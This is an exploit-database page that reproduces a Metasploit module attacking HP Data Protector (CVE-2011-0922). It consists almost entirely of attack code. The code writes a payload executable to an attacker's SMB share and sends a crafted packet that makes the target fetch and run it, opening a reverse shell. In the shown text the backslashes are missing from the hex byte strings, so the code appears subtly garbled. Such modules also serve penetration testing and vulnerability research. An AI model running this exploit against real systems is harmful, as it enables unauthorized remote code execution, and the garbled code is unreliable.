[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : HP Data Protector CMD Install Service Vulnerability (msf)
# Published : 2013-08-02
# Author :
# Previous Title : Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit
# Next Title : PCMAN FTP 2.07 PASS Command - Buffer Overflow
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-13-07
# Exploit Author: Ben Turner, Doug McLeod
# Vendor Homepage: www.hp.com
# Version: 6.10 & 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB
include Msf::Exploit::EXE
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::Client
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize
super(
'Name' => 'HP Data Protector CMD Install Service Vulnerability',
'Description' => %Q{
This module exploits HP Data Protector omniinet process on Windows only. This invokes the install service function that allows for a reverse tcp payload to your host. To ensure this works, the SMB server must have a share called Omniback which has a subfolder i386, i.e. \\192.168.1.1\Omniback\i386\
},
'Author' => [ 'Ben Turner', 'Doug McLeod' ],
'License' => BSD_LICENSE,
'References' =>
[
],
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'process'
},
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Platform' => ['win'],
'Targets' =>
[
[ 'HP Data Protector 6.10/6.11/6.20 on Windows', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'July 29 2013'
)
register_options([
OptString.new('SMBServer', [true, 'The IP address of the SMB server which hosts your share.', 'IPAddress']),
Opt::RPORT(5555),
], self.class)
end
def exploit
lhost = "#{datastore['SMBServer']}"
lhostfull = ""
lhost.each_char do |character|
lhostfull = lhostfull << "x00" << character
end
shellcode = "x00x00x01xbexffxfex32x00x00x00x20"
shellcode << lhostfull
shellcode << "x00x00x00x20x00x30x00"
shellcode << "x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00"
shellcode << "x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00"
shellcode << "x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00"
shellcode << "x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00"
shellcode << "x5c"
shellcode << lhostfull
shellcode << "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00"
shellcode << "x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00"
shellcode << "x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00"
shellcode << "x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00"
shellcode << "x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00"
shellcode << "x72x00x63x00x65x00x20x4fx00x6dx00x6ex00x69x00x62"
shellcode << "x00x61x00x63x00x6bx00x20x00x5cx00x5c"
shellcode << lhostfull
shellcode << "x5cx00x5cx00x4fx00"
shellcode << "x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00"
shellcode << "x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00"
shellcode << "x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00"
shellcode << "x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00"
shellcode << "x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00"
shellcode << "x5cx00x5c"
shellcode << lhostfull
shellcode << "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63"
shellcode << "x00x6bx00x20x00x00x00x00x00x00x00x02x54"
shellcode << "xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00"
shellcode << "x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00"
shellcode << "x41x00x44x00x45x00x0ax00x5cx00x5c"
shellcode << lhostfull
shellcode << "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63"
shellcode << "x00x6bx00x5cx00x69x00x33x00x38x00x36x00"
def filedrop()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Generating payload, dropping here: \\#{datastore['SMBServer']}\Omniback\i386\installservice.exe'...")
self.simple.connect("\\#{datastore['SMBServer']}\Omniback")
exe = generate_payload_exe
fd = smb_open("\i386\installservice.exe", 'rwct')
fd << exe
fd.close
self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost
rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}nn")
abort()
end
end
def filetest()
begin
origrport = self.datastore['RPORT']
self.datastore['RPORT'] = 445
origrhost = self.datastore['RHOST']
self.datastore['RHOST'] = self.datastore['SMBServer']
connect()
smb_login()
print_status("Checking the remote share for: \\#{datastore['SMBServer']}\Omniback\i386\installservice.exe'...n")
self.simple.connect("\\#{datastore['SMBServer']}\Omniback")
file = "\i386\installservice.exe"
filetest = smb_file_exist?(file)
if filetest
print_good(" Found, upload was succesful! \\#{datastore['SMBServer']}\Omniback\#{file}")
else
print_error("\\#{datastore['SMBServer']}\Omniback\#{file} - The file does not exist, try again!")
end
self.datastore['RPORT'] = origrport
self.datastore['RHOST'] = origrhost
rescue Rex::Proto::SMB::Exceptions::Error => e
print_error("File did not exist, or could not connect to the SMB share: #{e}nn")
abort()
end
end
begin
filedrop()
filetest()
connect()
sock.put(shellcode)
print_status("Waiting ...")
print_good("Sent :) Good Luck")
rescue ::Exception => e
print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}nn")
abort()
end
handler
#disconnect
end
end